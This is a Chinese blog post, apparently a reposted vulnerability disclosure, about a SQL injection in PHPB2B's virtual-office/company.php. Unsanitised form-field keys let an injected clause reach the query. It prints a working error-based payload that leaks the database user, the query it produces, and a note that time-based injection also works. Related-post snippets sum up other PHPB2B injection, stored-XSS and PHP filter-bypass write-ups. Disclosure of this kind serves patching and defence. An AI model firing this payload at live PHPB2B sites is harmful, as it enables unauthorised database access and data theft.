php内容过滤绕过,PHPB2B注入#1(绕过过滤)

最新推荐文章于 2021-06-02 17:37:31 发布
最新推荐文章于 2021-06-02 17:37:31 发布
阅读量114 收藏
点赞数
文章标签: php内容过滤绕过

PHPB2B某处注入#1。绕过过滤。 官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip 漏洞文件。virtual-office/company.php POST /phpb2b/virtual-office/company.php Content-Disposition: form-data; name=data[company][name] Content-Di

PHPB2B某处注入#1。绕过过滤。

官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip

漏洞文件。virtual-office/company.php

POST /phpb2b/virtual-office/company.php

Content-Disposition: form-data; name="data[company][name]"

Content-Disposition: form-data; name="data[company][english_name']"

Content-Disposition: form-data; name="data[company][employee_amount]"

Content-Disposition: form-data; name="data[company][year_annual]"

Content-Disposition: form-data; name="data[company][manage_type]"

Content-Disposition: form-data; name="data[company][property]"

Content-Disposition: form-data; name="data[company][description]"

Content-Disposition: form-data; name="data[company][main_prod]"

Content-Disposition: form-data; name="data[company][address]"

Content-Disposition: form-data; name="data[company][zipcode]"

Content-Disposition: form-data; name="data[company][boss_name]"

Content-Disposition: form-data; name="data[company][reg_address]"

...

...

多个参数存在同样的问题。

data[*][*1] 未经处理。

ex:

Content-Disposition: form-data; name="data[company][employee_amount FROM pb_thk_companyfields where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#]"

执行:

SELECT name,english_name,employee_amount FROM pb_thk_companyfields where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#,year_annual,manage_type,property,description,main_prod,address,zipcode,boss_name,reg_address,found_date,reg_fund,bank_from,bank_account,main_brand,main_biz_place,main_customer,link_man,position,mobile,site_url,email,employee_amount,tel,fax,picture,status,industry_id,area_id,modified,cache_membergroupid FROM pb_thk_companies WHERE id='12' AND member_id=3

本地测试开启了debug模式。

可延时注入。

a55cc694a6df0f5c8671cb6e404b3153.png

数据库日志。

5bb1cb444c7908132a9095d05484f8cb.png

解决方案:

过滤。

巴赫爱喝胡辣汤
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHPB2B电子商务网站管理系统源代码
03-18
友邻PHPB2B是一款基于PHP程序和Mysql数据库、以MVC架构为基础的开源B2B行业门户电子商务网站建站系统,系统代码完整、开源,功能全面,架构优秀,提供良好的用户体验、多国语言化及管理平台,是目前搭建B2B行业门户...
基于PHP的友邻PHPB2B电子商务网站管理系统源码.zip
最新发布
01-14
1. **框架和库**:友邻PHPB2B系统可能会基于某个PHP框架,如Laravel、Symfony或Yii,这些框架提供了结构化的开发环境和许多预定义的功能。 2. **前端资源**:HTML、CSS和JavaScript文件用于构建用户界面。可能还...
php代码转换成python_B站的AV号和BV转换【Python+PHP
weixin_39788451的博客
11-25 312
1. 缘由最近B站把原先的AV号转换成了BV号,由于某些原因我们需要AV号和BV号互转;2. Python源码# -*- coding: UTF-8 -*-table='fZodR9XQDSUm21yCkr6zBqiveYah8bt4xsWpHnJE7jL5VG3guMTKNPAwcF'tr={}for i in range(58):tr[table[i]]=is=[11,10,3,8,4,6]x...
wordpress在线播放php插件,让WordPress视频播放插件Smartideo支持B站BV
weixin_35387135的博客
04-07 588
打开Smartideo插件smartideo.php文件,在大约87行:array($this, 'smartideo_embed_handler_bilibili') );下面添加:wp_embed_register_handler( 'smartvideo_bilibili_bv','#https?://www\.bilibili\.com/video/BV(?:(?[a-z0-9_=\-]+...
php内容过滤绕过,PHPB2B注入(绕过过滤)
weixin_36310141的博客
03-24 218
### 简要描述:PHPB2B某处注入绕过过滤。### 详细说明:官方最新版本.https://github.com/ulinke/phpb2b/archive/master.zip漏洞文件。virtual-office/offer.phpPOST /virtual-office/offer.phpContent-Disposition: form-data; name="data[trade]...
php注入某大型网站,PHPB2B网站管理系统SQL注入漏洞(无视防注入)
weixin_29315569的博客
03-19 283
### 简要描述:RT### 详细说明:```注入链接:/virtual-office/job.php注入参数:job漏洞代码:(第52行开始)if (!empty($_POST['job']) && $_POST['save']) {$vals = $_POST['job'];pb_submit_check('job'); // 验证post提交的token,可直接使用get...
php 存储型跨站,PHPB2B存储型跨站(可打管理员和任意用户)
weixin_35817602的博客
03-26 138
### 简要描述:PHPB2B v5.0.2对字段过滤不严格导致存储型跨站,可嵌入任意脚本文件,攻击管理员和任意用户。### 详细说明:1、phpB2B对用户发布供求信息模块,没有进行有效过滤,存在漏洞的字段包括主题、包装说明、价格说明等等。攻击者可以插入恶意代码,后台管理员审核用户供求信息时,漏洞触发,审核过程中,管理员并不会发现任何恶意代码,审核一旦成功,其它任何用户浏览供求信息时,便会触发漏...
基于PHP的齐博phpB2B电子商务系统源码.zip
10-21
齐博phpB2B电子商务系统是一款基于PHP编程语言开发的商业对商业(Business-to-Business,简称B2B)在线交易平台。它为商家提供了一个全面的功能框架,用于构建和管理在线销售、采购、库存和订单处理等业务流程。在这...
PHPB2B电子商务网站管理系统 v6.0
10-22
友邻PHPB2B是一款基于PHP程序和Mysql数据库、以MVC架构为基础的开源B2B行业门户电子商务网站建站系统,系统代码完整、开源,功能全面,架构优秀,提供良好的用户体验、多国语言化及管理平台,是目前搭建B2B行业门户...
PHPB2B:纯粹的商贸网站开源软件
CURSED!
11-05 261
PHPB2B前身叫友邻B2B,是国内首家开放源代码的B2B建站程序。可以为互联网用户、创业团队快速构建B2B分类信息系统、商贸网站、电子商 务网站等多种形式的电子商务行业网站平台, 该系统基于PHP+Mysql开发, 采用优秀的MVC架构思想,同时本系统采用了流行的Smarty模板技术, 静态模板与动态程序完全分离,系统自带十余个内容丰富的调用标签,同时可自由扩展各种插件或其他功能, 秉承开...
友邻B2B系统(PHPB2B) 6.0.3
05-01
友邻B2B网站系统(PHPB2B)是一款基于PHP程序和Mysql数据库、以MVC架构为基础的开源B2B行业门户电子商务网站建站系统,系统代码完整、开源,功能全面,架构优秀,提供良好的用户体验、多国语言化及管理平台,是目前搭建B2B行业门户网站最好的程序。 友邻B2B系统(PHPB2B) 6.0.3 更新日志:2019-12-17 修复一些错误。
phpb2b:开源和免费的b2b脚本-开源
05-10
使用PHPB2B(开源php b2b脚本)构建b2b贸易门户,并从以下网站获取帮助:https://sourceforge.net/apps/phpbb/phpb2b/
PHPB2B电子商务平台__开源版
02-27
安装步骤: 第一步:修改根目录和admin目录下的myconnect.php 文件为您的数据库连接。 第二步:打开phpMyadmin,导入xpbbcom.sql文件。 第三步:上传文件包,并且使 1. thumbs1 2. thumbs2 3. uploadedimages 4. 管理/sbbleads_icons 为可写入权限。 如果有更多疑问,请到[url]http://bbs.xpbb.com/forum-37-1.html[/url]提问。 后台登陆地址:/admin/ 帐号:admin 密码:admin
phpb2b:PHPB2B是一个开源和免费的b2b程序
05-24
PHPB2B PHPB2B是Ualink社区提供的免费开源B2B程序,一直致力于为企业提供出色的开源电子商务解决方案。 自从第一版于2007年发布以来,已有12年的历史。 它是为数不多的持续提供更新的开源B2B系统之一。 我们的目标是使更多企业能够快速建立行业电子商务网站,而无需关注程序开发和繁琐的设置,从而使企业专注于运营。 对于用户而言,它可以促进交易并在平台上找到买家。 对于开发人员来说,它还具有强大的可定制性,丰富的插件界面和精美的主题模板。 可以预料,PHPB2B将成为企业走向电子商务的首选。 一些方便的链接 非常快速的阿里巴巴b2b克隆脚本。 -PHPB2B论坛。 -PHPB2B演示。 得到支持! -有问题吗? 请告诉我们! 安全漏洞说明 对于安全漏洞,请通过service#ualink.net与我们联系,并且不要在GitHub Issue上发布。 提交安全漏洞,
php b2b 设计思路,phpb2b研究(八) ----广告
weixin_39846612的博客
03-21 81
---- 表的结构 `pb_adses` ----广告表--CREATE TABLE IF NOT EXISTS `pb_adses` (`id` smallint(6) NOT NULL auto_increment,`adzone_id` smallint(3) NOT NULL default '0',`title` varchar(50) NOT NULL default '',`de...
PHP花式绕过大全
fly夏天的博客
10-18 1万+
做了这么长的时间的ctf,现在总结一下自己做过的题,记录一下各种可能会存在绕过php函数,持续跟新。 各位大佬可以一起交流♂交流。 1.preg_replace ($pattern , $replacement , $subject ) 其中 $pattern为正则表达式 $replacement为替换字符串 $subject 为要搜索...
浅谈PHP代码执行中出现过滤限制的绕过执行方法
热门推荐
末初的CSDN博客
01-13 2万+
参考: https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html 字符串异或绕过 只适用于PHP5
绕过PHP代码执行中的过滤限制详解
LYJ20010728的博客
06-02 2192
绕过PHP代码执行中的过滤限制详解代码执行函数字符串拼接绕过字符串转义绕过多次传参绕过内置函数访问绕过异或绕过绕过URL编码取反绕过递增递减运算符绕过上传临时文件 代码执行函数 PHP中具有代码执行功能的函数 eval():最常见的代码执行函数,把字符串 code 作为PHP代码执行 eval ( string $code ) : mixed assert():检查一个断言是否为false assert()会检查指定的assertion并在结果为false时采取适当的行动,在PHP5或P
php代码学习(二)绕过空白过滤
tutu123456789101112的博客
02-28 1426
<?php $info = ""; $req = []; $flag="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; ini_set("display_error", false); //为一个配置选项设置值 error_reporting(0); //关闭所有PHP错误报告 if(!isset($_GET['numb

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值